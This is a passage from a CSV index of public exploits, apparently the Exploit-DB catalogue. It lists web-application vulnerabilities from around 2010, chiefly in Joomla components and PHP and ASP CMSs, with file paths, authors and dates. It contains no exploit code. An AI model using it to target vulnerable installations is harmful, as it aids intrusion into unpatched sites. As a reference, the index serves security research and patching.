Injections",2010-08-10,"Salvatore Fresta",php,webapps, -14589,exploits/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,php,webapps, -14592,exploits/php/webapps/14592.txt,"Joomla! Component com_yellowpages - SQL Injection",2010-08-09,"al bayraqim",php,webapps, -14595,exploits/php/webapps/14595.html,"wizmall 6.4 - Cross-Site Request Forgery",2010-08-09,pyw1414,php,webapps, -14596,exploits/php/webapps/14596.txt,"Joomla! Component Amblog 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",php,webapps, -14606,exploits/multiple/webapps/14606.html,"Zendesk - Multiple Vulnerabilities",2010-08-10,"Luis Santana",multiple,webapps, -14614,exploits/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Inclusion",2010-08-11,Offensive,php,webapps, -14615,exploits/php/webapps/14615.txt,"phpMUR - Remote File Disclosure",2010-08-11,Offensive,php,webapps, -14618,exploits/php/webapps/14618.txt,"Saurus CMS 4.7.0 - Remote File Inclusion",2010-08-11,LoSt.HaCkEr,php,webapps, -14617,exploits/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 - webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps, -14622,exploits/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Persistent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps, -14628,exploits/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 -14629,exploits/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",multiple,webapps,80 -14636,exploits/php/webapps/14636.txt,"Plogger - Remote File Disclosure",2010-08-13,Mr.tro0oqy,php,webapps, -14637,exploits/php/webapps/14637.txt,"Get Tube - SQL Injection",2010-08-13,Mr.P3rfekT,php,webapps, -14639,exploits/php/webapps/14639.txt,"MailForm 1.2 - Remote File Inclusion",2010-08-13,LoSt.HaCkEr,php,webapps, -14640,exploits/php/webapps/14640.txt,"ACollab - Multiple Vulnerabilities",2010-08-14,AmnPardaz,php,webapps, -14643,exploits/php/webapps/14643.txt,"sFileManager 24a - Local File Inclusion",2010-08-14,Pepelux,php,webapps, -14644,exploits/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-14,"Fady Mohammed Osman",php,webapps, -14645,exploits/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - 'news_id' SQL Injection",2010-08-14,LiquidWorm,php,webapps, -14647,exploits/php/webapps/14647.php,"PHP-Fusion - Local File Inclusion",2010-08-15,MoDaMeR,php,webapps, -14648,exploits/php/webapps/14648.txt,"Guestbook Script PHP - Cross-Site Scripting / HTML Injection",2010-08-15,"AnTi SeCuRe",php,webapps, -14650,exploits/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,php,webapps, -14654,exploits/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps, -14655,exploits/php/webapps/14655.txt,"Joomla! Component com_equipment - SQL Injection",2010-08-16,Forza-Dz,php,webapps, -14656,exploits/php/webapps/14656.txt,"Joomla! Component com_jgrid 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps, -14659,exploits/php/webapps/14659.txt,"Joomla! Component com_ongallery - SQL Injection",2010-08-16,"al bayraqim",php,webapps, -14672,exploits/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion",2010-08-17,Dr.$audi,php,webapps, -14684,exploits/php/webapps/14684.php,"Open-Realty 2.5.7 - Local File Disclosure",2010-08-18,"Nikola Petrov",php,webapps, -14686,exploits/php/webapps/14686.txt,"vbbuletin 4.0.4 - Multiple Vulnerabilities",2010-08-19,mc2_s3lector,php,webapps, -14707,exploits/php/webapps/14707.txt,"Joomla! Component Fabrik - SQL Injection",2010-08-21,Mkr0x,php,webapps, -14694,exploits/php/webapps/14694.txt,"Joomla! Component com_extcalendar - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps, -14702,exploits/php/webapps/14702.txt,"Joomla! Component com_zina - SQL Injection",2010-08-21,"Th3 RDX",php,webapps, -14703,exploits/php/webapps/14703.txt,"Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",php,webapps, -14704,exploits/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps, -14709,exploits/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection",2010-08-22,L1nK,asp,webapps, -14712,exploits/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion",2010-08-23,LoSt.HaCkEr,php,webapps, -14714,exploits/php/webapps/14714.txt,"Gazelle CMS - Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps, -14716,exploits/php/webapps/14716.txt,"AneCMS - '/registre/next' SQL Injection",2010-08-23,Sweet,php,webapps, -14717,exploits/php/webapps/14717.txt,"Link CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps, -14718,exploits/php/webapps/14718.txt,"Joomla! Component com_zoomportfolio - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps, -14722,exploits/php/webapps/14722.txt,"Joomla! 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps, -14828,exploits/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,php,webapps, -14737,exploits/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps, -14742,exploits/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps, -14818,exploits/linux/webapps/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",linux,webapps, -14817,exploits/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps, -14806,exploits/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps, -14799,exploits/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps, -14801,exploits/php/webapps/14801.txt,"Atomic Photo Album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps, -14802,exploits/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps, -14811,exploits/php/webapps/14811.txt,"Joomla! Component com_remository - Arbitrary File Upload",2010-08-26,J3yk0ob,php,webapps, -14808,exploits/php/webapps/14808.pl,"Mini-CMS / News Script Light 1.0 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps, -14809,exploits/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps, -14810,exploits/php/webapps/14810.txt,"Gaestebuch 1.2 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps, -14815,exploits/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusions",2010-08-27,eidelweiss,php,webapps, -14819,exploits/php/webapps/14819.html,"Pc4Uploader 9.0 - Cross-Site Request Forgery",2010-08-27,RENO,php,webapps, -14820,exploits/php/webapps/14820.txt,"iGaming CMS - Multiple SQL Injections",2010-08-27,Sweet,php,webapps, -14821,exploits/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection",2010-08-27,Pouya_Server,asp,webapps, -14822,exploits/php/webapps/14822.txt,"DIY-CMS 1.0 - Multiple Remote File Inclusions",2010-08-28,LoSt.HaCkEr,php,webapps, -14823,exploits/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,php,webapps, -14826,exploits/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps, -14827,exploits/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps, -14829,exploits/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - 'settings.cdb' Information Disclosure",2010-08-28,Dr.$audi,php,webapps, -14833,exploits/php/webapps/14833.txt,"vBulletin 3.8.4/3.8.5 - Registration Bypass",2010-08-29,"Immortal Boy",php,webapps, -14834,exploits/php/webapps/14834.txt,"Max's Guestbook - HTML Injection / Cross-Site Scripting",2010-08-29,"MiND C0re",php,webapps, -14835,exploits/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusions",2010-08-29,JosS,php,webapps, -14837,exploits/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps, -14838,exploits/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps, -14839,exploits/php/webapps/14839.txt,"GuestBookPlus - HTML Injection / Bypass Comments Limit",2010-08-29,"MiND C0re",php,webapps, -14841,exploits/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps, -14845,exploits/php/webapps/14845.txt,"Joomla! Component PicSell 1.0 - Local File Disclosure",2010-08-30,Craw,php,webapps, -14846,exploits/php/webapps/14846.txt,"Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injections",2010-08-31,"Chip d3 bi0s",php,webapps, -14849,exploits/php/webapps/14849.py,"mBlogger 1.0.04 - 'viewpost.php' SQL Injection",2010-08-31,"Ptrace Security",php,webapps, -14854,exploits/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps, -14851,exploits/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps, -14870,exploits/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps, -14860,exploits/php/webapps/14860.txt,"PHP Joke Site Software - 'sbjoke_id' SQL Injection",2010-09-01,"BorN To K!LL",php,webapps, -14867,exploits/php/webapps/14867.txt,"vbShout 5.2.2 - Local/Remote File Inclusion",2010-09-02,fred777,php,webapps, -14876,exploits/php/webapps/14876.txt,"Shop a la Cart - Multiple Vulnerabilities",2010-09-02,Ariko-Security,php,webapps, -14879,exploits/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps, -14884,exploits/php/webapps/14884.txt,"smbind 0.4.7 - SQL Injection",2010-09-03,r00t,php,webapps, -14887,exploits/php/webapps/14887.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (1)",2010-09-04,Abysssec,php,webapps, -14890,exploits/php/webapps/14890.py,"mBlogger 1.0.04 - 'addcomment.php' Persistent Cross-Site Scripting",2010-09-04,"Ptrace Security",php,webapps, -14891,exploits/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",2010-09-04,"BorN To K!LL",php,webapps, -14893,exploits/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps, -14894,exploits/php/webapps/14894.py,"A-Blog 2.0 - '/sources/search.php' SQL Injection",2010-09-05,"Ptrace Security",php,webapps, -14896,exploits/php/webapps/14896.txt,"Joomla! Component iJoomla Magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps, -14897,exploits/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,AmnPardaz,php,webapps, -14898,exploits/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities",2010-09-05,Abysssec,asp,webapps, -14901,exploits/php/webapps/14901.txt,"Joomla! Component Clantools 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,php,webapps, -14902,exploits/php/webapps/14902.txt,"Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injections",2010-09-05,Solidmedia,php,webapps, -14913,exploits/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",2010-09-06,"L0rd CrusAd3r",asp,webapps, -14908,exploits/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps, -14910,exploits/php/webapps/14910.txt,"Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps, -14911,exploits/php/webapps/14911.sh,"Joomla! Component Gantry 3.0.10 - Blind SQL Injection",2010-09-05,jdc,php,webapps, -14932,exploits/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,windows,webapps, -14914,exploits/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps, -14915,exploits/php/webapps/14915.txt,"InterPhoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps, -14919,exploits/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps, -14922,exploits/php/webapps/14922.txt,"Joomla! Component Aardvertiser 2.1 - Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps, -14923,exploits/php/webapps/14923.txt,"WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting",2010-09-06,Craw,php,webapps, -14931,exploits/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal",2010-09-07,Saxtor,php,webapps, -14927,exploits/php/webapps/14927.txt,"dynpage 1.0 - Multiple Vulnerabilities",2010-09-07,Abysssec,php,webapps, -14933,exploits/windows/webapps/14933.txt,"ColdBookmarks 1.22 - SQL Injection",2010-09-07,mr_me,windows,webapps, -14934,exploits/windows/webapps/14934.txt,"ColdOfficeView 2.04 - Multiple Blind SQL Injections",2010-09-07,mr_me,windows,webapps, -14935,exploits/windows/webapps/14935.py,"ColdUserGroup 1.06 - Blind SQL Injection",2010-09-07,mr_me,windows,webapps, -14942,exploits/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection",2010-09-07,"Stephan Sattler",php,webapps, -14943,exploits/asp/webapps/14943.txt,"sirang web-based d-control - Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps, -14952,exploits/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 Free mod_visitorsgooglemap Module - SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps, -14954,exploits/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps, -15442,exploits/php/webapps/15442.txt,"Zeeways Adserver - Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps, -15443,exploits/php/webapps/15443.txt,"Joomla! Component com_forme 1.0.5 - Multiple Vulnerabilities",2010-11-06,jdc,php,webapps, -14960,exploits/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,php,webapps, -14962,exploits/multiple/webapps/14962.txt,"CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80 -14964,exploits/php/webapps/14964.txt,"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps, -14965,exploits/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion",2010-09-10,LoSt.HaCkEr,php,webapps, -14968,exploits/php/webapps/14968.txt,"symphony 2.0.7 - Multiple Vulnerabilities",2010-09-10,JosS,php,webapps, -14969,exploits/asp/webapps/14969.txt,"ASP Nuke - SQL Injection",2010-09-11,Abysssec,asp,webapps, -14973,exploits/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps, -14977,exploits/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection / Authentication Bypass",2010-09-12,"YuGj VN",php,webapps, -14980,exploits/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,asp,webapps, -14985,exploits/php/webapps/14985.txt,"System Shop - 'Module aktka' SQL Injection",2010-09-12,secret,php,webapps, -14986,exploits/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection",2010-09-12,CoBRa_21,php,webapps, -14988,exploits/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,php,webapps, -14989,exploits/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",2010-09-13,Xa7m3d,php,webapps, -14991,exploits/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",2010-09-13,Abysssec,asp,webapps, -14995,exploits/php/webapps/14995.txt,"Joomla! Component com_mtree 2.1.5 - Arbitrary File Upload",2010-09-13,jdc,php,webapps, -14996,exploits/php/webapps/14996.txt,"Storyteller CMS - 'var' Local File Inclusion",2010-09-13,"BorN To K!LL",php,webapps, -14997,exploits/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection",2010-09-13,KnocKout,php,webapps, -14998,exploits/php/webapps/14998.txt,"Joomla! Component JGen 0.9.33 - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps, -14999,exploits/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps, -15004,exploits/php/webapps/15004.pl,"E-Xoopport Samsara 3.1 (Sections Module) - Blind SQL Injection",2010-09-14,_mRkZ_,php,webapps, -15006,exploits/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection",2010-09-15,vYc0d,php,webapps, -15011,exploits/php/webapps/15011.txt,"PHP microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps, -15014,exploits/php/webapps/15014.txt,"PixelPost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps, -36828,exploits/java/webapps/36828.txt,"JaWiki - 'versionNo' Cross-Site Scripting",2012-02-17,sonyy,java,webapps, -15018,exploits/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps, -15029,exploits/php/webapps/15029.txt,"phpMyFamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps, -15037,exploits/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,php,webapps, -15039,exploits/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection",2010-09-18,secret,php,webapps, -15040,exploits/php/webapps/15040.txt,"Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps, -15041,exploits/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps, -15044,exploits/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps, -15046,exploits/php/webapps/15046.txt,"Fashione E-Commerce Webshop - Multiple SQL Injections",2010-09-19,secret,php,webapps, -15049,exploits/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection",2010-09-19,BrOx-Dz,php,webapps, -15050,exploits/php/webapps/15050.txt,"Opencart 1.4.9.1 - Arbitrary File Upload",2010-09-19,Net.Edit0r,php,webapps, -15100,exploits/win_x86/webapps/15100.txt,"Joomla! Component Elite Experts - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80 -15058,exploits/asp/webapps/15058.html,"VWD-CMS - Cross-Site Request Forgery",2010-09-20,Abysssec,asp,webapps, -15060,exploits/php/webapps/15060.txt,"LightNEasy CMS 3.2.1 - Blind SQL Injection",2010-09-20,Solidmedia,php,webapps, -15064,exploits/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps, -15067,exploits/asp/webapps/15067.txt,"Personal.Net Portal - Multiple Vulnerabilities",2010-09-21,Abysssec,asp,webapps, -15070,exploits/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps, -15075,exploits/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,php,webapps, -15078,exploits/asp/webapps/15078.txt,"gausCMS - Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps, -15080,exploits/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross-Site Request Forgery",2010-09-22,Sweet,php,webapps, -15082,exploits/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Authentication Bypass",2010-09-22,K-159,php,webapps, -15084,exploits/php/webapps/15084.txt,"Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injections",2010-09-22,"Salvatore Fresta",php,webapps, -15085,exploits/php/webapps/15085.txt,"Joomla! Component Joostina - SQL Injection",2010-09-22,Gamoscu,php,webapps, -15090,exploits/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection",2010-09-23,BrOx-Dz,php,webapps, -15091,exploits/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection",2010-09-23,Gamoscu,php,webapps, -15092,exploits/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusions",2010-09-23,cOndemned,php,webapps, -15093,exploits/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local File Inclusions",2010-09-24,sh00t0ut,php,webapps, -15098,exploits/php/webapps/15098.txt,"FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps, -15114,exploits/php/webapps/15114.php,"ZenPhoto - Config Update / Command Execution",2010-09-26,Abysssec,php,webapps, -15102,exploits/win_x86/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery (Add Admin)",2010-09-24,"John Johnz",win_x86,webapps,80 -15106,exploits/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps, -15157,exploits/php/webapps/15157.txt,"Joomla! Component JE Guestbook 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps, -15118,exploits/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps, -15119,exploits/php/webapps/15119.txt,"PEEL Premium 5.71 - SQL Injection",2010-09-26,KnocKout,php,webapps, -15110,exploits/php/webapps/15110.txt,"E-Xoopport Samsara 3.1 (eCal Module) - Blind SQL Injection",2010-09-25,_mRkZ_,php,webapps, -15120,exploits/cfm/webapps/15120.txt,"Blue River Mura CMS - Directory Traversal",2010-09-26,mr_me,cfm,webapps, -15121,exploits/php/webapps/15121.txt,"pbboard 2.1.1 - Multiple Vulnerabilities",2010-09-27,JIKO,php,webapps, -15124,exploits/asp/webapps/15124.txt,"ndCMS - SQL Injection",2010-09-27,Abysssec,asp,webapps, -15126,exploits/php/webapps/15126.txt,"Entrans - SQL Injection",2010-09-27,keracker,php,webapps, -15130,exploits/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall 4.1.1.021 - Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps, -15128,exploits/win_x86/webapps/15128.txt,"Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting",2010-09-27,**RoAd_KiLlEr**,win_x86,webapps,80 -15198,exploits/php/webapps/15198.txt,"Aprox CMS Engine 6.0 - Multiple Vulnerabilities",2010-10-03,"Stephan Sattler",php,webapps, -15135,exploits/php/webapps/15135.txt,"Car Portal 2.0 - Blind SQL Injection",2010-09-27,**RoAd_KiLlEr**,php,webapps, -15143,exploits/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection",2010-09-28,"High-Tech Bridge SA",php,webapps, -15139,exploits/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps, -15141,exploits/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,php,webapps, -15144,exploits/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure SQL Injection / Cookie Handling",2010-09-28,KnocKout,windows,webapps, -15145,exploits/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Vulnerabilities",2010-09-28,"Pablo Milano",php,webapps, -15146,exploits/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps, -15147,exploits/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent Cross-Site Scripting",2010-09-28,"SecPod Research",php,webapps, -15151,exploits/php/webapps/15151.txt,"Webspell 4.2.1 - 'asearch.php' SQL Injection",2010-09-29,"silent vapor",php,webapps, -15152,exploits/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net - static Blind SQL Injection",2010-09-29,"Easy Laster",php,webapps, -15153,exploits/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps, -15154,exploits/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' SQL Injection",2010-09-29,"BorN To K!LL",php,webapps, -15160,exploits/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps, -15162,exploits/php/webapps/15162.rb,"Joomla! Component JE Job - SQL Injection",2010-09-30,"Easy Laster",php,webapps, -15163,exploits/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",2010-09-30,"Easy Laster",php,webapps, -15164,exploits/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",php,webapps, -15165,exploits/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps, -15166,exploits/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion",2010-10-01,LiquidWorm,php,webapps, -15169,exploits/php/webapps/15169.txt,"Evaria Content Management System 1.1 - File Disclosure",2010-10-01,"khayeye shotor",php,webapps, -15174,exploits/php/webapps/15174.txt,"Tiki Wiki CMS Groupware 5.2 - Multiple Vulnerabilities",2010-10-01,"John Leitch",php,webapps, -15173,exploits/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps, -15171,exploits/php/webapps/15171.txt,"jCart 1.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps, -15175,exploits/php/webapps/15175.txt,"Chipmunk Board 1.3 - 'index.php?forumID' SQL Injection",2010-10-01,Shamus,php,webapps, -15199,exploits/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure",2010-10-04,ZoRLu,asp,webapps, -15183,exploits/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure",2010-10-02,ZoRLu,asp,webapps, -15177,exploits/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps, -15185,exploits/asp/webapps/15185.txt,"SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps, -15189,exploits/asp/webapps/15189.txt,"SmarterMail < 7.2.3925 - LDAP Injection",2010-10-02,sqlhacker,asp,webapps, -15191,exploits/asp/webapps/15191.txt,"TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting",2010-10-02,KnocKout,asp,webapps, -15194,exploits/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps, -15200,exploits/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps, -15204,exploits/php/webapps/15204.txt,"DNET Live-Stats 0.8 - Local File Inclusion",2010-10-04,blake,php,webapps, -15205,exploits/php/webapps/15205.txt,"Aspect Ratio CMS - Blind SQL Injection",2010-10-04,"Stephan Sattler",php,webapps, -15207,exploits/php/webapps/15207.txt,"Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion",2010-10-04,blake,php,webapps, -15208,exploits/php/webapps/15208.txt,"CuteNews - 'page' Local File Inclusion",2010-10-05,eidelweiss,php,webapps, -15209,exploits/php/webapps/15209.txt,"SPAW Editor 2.0.8.1 - Local File Inclusion",2010-10-05,"soorakh kos",php,webapps, -15210,exploits/php/webapps/15210.txt,"Cag CMS 0.2 - Cross-Site Scripting / Blind SQL Injection",2010-10-05,Shamus,php,webapps, -15284,exploits/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection",2010-10-19,"Salvatore Fresta",php,webapps, -15217,exploits/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Arbitrary File Upload",2010-10-07,KnocKout,php,webapps, -15218,exploits/asp/webapps/15218.txt,"xWeblog 2.2 - 'oku.asp?makale_id' SQL Injection",2010-10-07,KnocKout,asp,webapps, -15219,exploits/asp/webapps/15219.py,"xWeblog 2.2 - 'arsiv.asp?tarih' SQL Injection",2010-10-08,ZoRLu,asp,webapps, -15220,exploits/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps, -15222,exploits/php/webapps/15222.txt,"Joomla! Component Community Builder Enhanced (CBE) 1.4.8/1.4.9/1.4.10 - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps, -15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple 